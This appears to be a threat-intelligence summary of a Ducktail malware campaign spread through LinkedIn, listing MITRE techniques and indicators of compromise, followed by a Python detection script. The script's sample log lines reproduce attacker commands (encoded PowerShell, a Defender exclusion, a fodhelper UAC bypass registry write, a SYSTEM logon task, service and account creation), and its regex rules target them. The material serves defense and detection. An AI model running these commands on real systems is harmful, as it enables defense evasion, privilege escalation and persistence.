eSentire’s TRU team analyzed a Ducktail malware attempt delivered via LinkedIn, featuring multi-stage PowerShell payloads, obfuscated scripts, and UAC bypass techniques. The campaign culminated in a remote command-and-control setup with persistence via a scheduled task and a Windows service, highlighting defense evasion and persistence risks. #Ducktail #Kaseya #more_eggs #LinkedIn
Keypoints
- Initial access came through LinkedIn: the target, an employee in digital marketing, received a ZIP archive containing oversized shortcuts that execute PowerShell.
- The shortcuts carry base64-encoded strings that decode to a PowerShell script used to fetch additional payloads from a remote host.
- UAC bypass and privilege escalation techniques are employed, including fodhelper.exe, with a fallback to admin-privileged downloads and DLL overwrites.
- Defense evasion includes checking for antivirus activity and adding a Defender exclusion (Add-MpPreference -ExclusionPath) for C:\Windows\Temp.
- Payloads establish a C2 connection, download mainbot.exe and myRdpService.exe, and create persistence via a scheduled task and a Windows service.
- The campaign shows extensive obfuscation and download retries, and ends with remote control of the infected host.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The attacker contacted the employee via LinkedIn with an attachment leading to a ZIP archive. “The ZIP archive contains bloated shortcuts that are over 800MB in size.”
- [T1059.001] PowerShell – The shortcuts contain batch scripts that execute PowerShell commands. “The shortcuts contain the batch scripts that execute PowerShell commands.”
- [T1105] Ingress Tool Transfer – The script downloads files from a remote host. “The script downloads the file from hxxps://gdfsgfdrgetgergdsf[.]tech/file/ps/5f8f8c05db68cca200c6379b825648b5.jpg (MD5: 5f8f8c05db68cca200c6379b825648b5).”
- [T1548.002] Bypass User Account Control – UAC bypass with fodhelper.exe to download and execute payloads. “If UAC is enabled, it attempts a UAC bypass technique using fodhelper.exe …”
- [T1562.001] Impair Defenses – Defender exclusion via Add-MpPreference to bypass detections. “adds an exclusion path to it using Add-MpPreference -ExclusionPath.”
- [T1053] Scheduled Task – Creates a scheduled task to run the downloaded file with SYSTEM privileges at logon. “The threat creates a new scheduled task (zServicequyet) to execute the downloaded file … set to trigger at logon.”
- [T1543.003] Create Windows Service – Creates a service (myRdpService) to run payloads. “The service ‘myRdpService’ is created to start myRdpService.exe with an argument ‘quyet’ …”
- [T1136] Create Account – Attempts to create a local user “User1” on the infected machine. “attempts to create the user ‘User1’ on infected machine.”
- [T1071.001] Web Protocols – Uses HTTP/HTTPS to communicate with C2 and receive commands. “establishing the connection with the C2 server and taking remote commands.”
- [T1027] Obfuscated/Compressed Files and Information – Uses base64 encoding and XOR-based decryption to obfuscate payloads. “base64-encoded strings that decode to the script” and “hardcoded XOR key”
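As an added example (not code from the eSentire post or from this page), the script below turns the Keypoints and MITRE mappings above into simple detection rules and runs them over constructed command-line log lines: a Defender exclusion being added, the fodhelper.exe UAC bypass, an on-logon SYSTEM scheduled task, a service creation, a local account creation, a download and an encoded PowerShell command, plus a size check for bloated shortcuts. The regex rules, the ms-settings registry path used by the classic fodhelper variant, the 100 MiB shortcut threshold and every sample log line are assumptions or constructions, not indicators taken from the report.

```python
import re
from dataclasses import dataclass

# Detection rules keyed to the MITRE techniques listed above. The patterns are
# assumptions written for the behaviours the summary describes; tune them to
# your own logging (Sysmon event 1 / PowerShell 4104 text, EDR command lines).
RULES = [
    ("T1562.001", "Defender exclusion path added",
     re.compile(r"Add-MpPreference\s+.*-ExclusionPath", re.I)),
    ("T1548.002", "fodhelper UAC bypass (ms-settings handler hijack, classic variant)",
     re.compile(r"fodhelper\.exe|ms-settings\\shell\\open\\command", re.I)),
    ("T1053", "Scheduled task running as SYSTEM at logon",
     re.compile(r'schtasks(?:\.exe)?\s+/create(?=.*/sc\s+onlogon)'
                r'(?=.*/ru\s+"?(?:nt authority\\)?system\b)', re.I)),
    ("T1543.003", "Windows service created",
     re.compile(r"\bsc(?:\.exe)?\s+create\s+\S+|\bNew-Service\b", re.I)),
    ("T1136", "Local account created",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("T1105", "Remote file download",
     re.compile(r"(?:Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|"
                r"DownloadString|Start-BitsTransfer).*https?://", re.I)),
    ("T1027", "Encoded / base64 PowerShell",
     re.compile(r"-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{40,}|FromBase64String", re.I)),
]


@dataclass
class Finding:
    technique: str
    name: str
    line_no: int
    text: str


def scan_lines(lines):
    """Return one Finding per (line, rule) match, in line order."""
    findings = []
    for i, line in enumerate(lines):
        for technique, name, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(technique, name, i, line))
    return findings


def chain_detected(findings, min_techniques=3):
    """True when enough distinct techniques appear to suggest a multi-stage chain."""
    return len({f.technique for f in findings}) >= min_techniques


def is_bloated_shortcut(filename, size_bytes, threshold=100 * 1024 * 1024):
    """Flag .lnk files far larger than a real shortcut (threshold is an assumption)."""
    return filename.lower().endswith(".lnk") and size_bytes > threshold


# Constructed sample log lines (not real telemetry). The first is benign admin
# activity and should not fire; the rest mimic the behaviours in the summary.
SAMPLE_LOG = [
    "powershell.exe Get-MpPreference | Select-Object ExclusionPath",
    "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
    "powershell.exe Add-MpPreference -ExclusionPath C:\\Windows\\Temp",
    "reg.exe add HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command /ve /d C:\\Windows\\Temp\\svczHost.exe /f",
    "fodhelper.exe",
    "powershell.exe Invoke-WebRequest https://example.invalid/file/ps/payload.jpg -OutFile C:\\Windows\\Temp\\mainbot.exe",
    "schtasks.exe /create /tn zServicequyet /tr C:\\Windows\\Temp\\mainbot.exe /sc onlogon /ru SYSTEM /f",
    'sc.exe create myRdpService binPath= "C:\\Windows\\Temp\\myRdpService.exe quyet" start= auto',
    "net.exe user User1 P@ssw0rd /add",
]

if __name__ == "__main__":
    hits = scan_lines(SAMPLE_LOG)
    for f in hits:
        print(f"line {f.line_no}: [{f.technique}] {f.name}: {f.text}")
    print("multi-stage chain suspected:", chain_detected(hits))
    print("bloated shortcut:", is_bloated_shortcut("invoice.lnk", 850 * 1024 * 1024))
```

Each rule on its own produces noise (administrators do add exclusions and create services), which is why `chain_detected` correlates distinct techniques on one host; the ordering in the summary (exclusion, then UAC bypass, then download, then task and service) is what makes the combination worth escalating.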
Indicators of Compromise
- [Hash] MD5 – 5f8f8c05db68cca200c6379b825648b5, 5be7408b84fbd40c8e7930f4c28a585a, and 1ade74bbf88c1a41a352682a8f2265f9
- [URL] hxxps://gdfsgfdrgetgergdsf[.]tech/file/ps/5f8f8c05db68cca200c6379b825648b5.jpg, hxxp://gdfsgfdrgetgergdsf[.]tech/file/docs/
- [URL] hxxps://gdfsgfdrgetgergdsf[.]tech/file/ps/d4e1a9191216420ce7989cf6c3e203cd.jpg
- [URL] http://138.201.8.186:8000/file/rdpwrap.txt, http://138.201.8.186:8000/file/t/RdpService.exe
- [IP] 138.201.8.186:8000, 23.88.71.29:8000, 138.201.8.186:8001
- [Domain] gdfsgfdrgetgergdsf.tech
- [File] mainbot.exe, svczHost.exe, myRdpService.exe, propsys.dll
- [File] 5be7408b84fbd40c8e7930f4c28a585a.jpg (and related decoy/ps files)
Read more: https://www.esentire.com/blog/ducktail-and-peeling-the-layers-of-powershell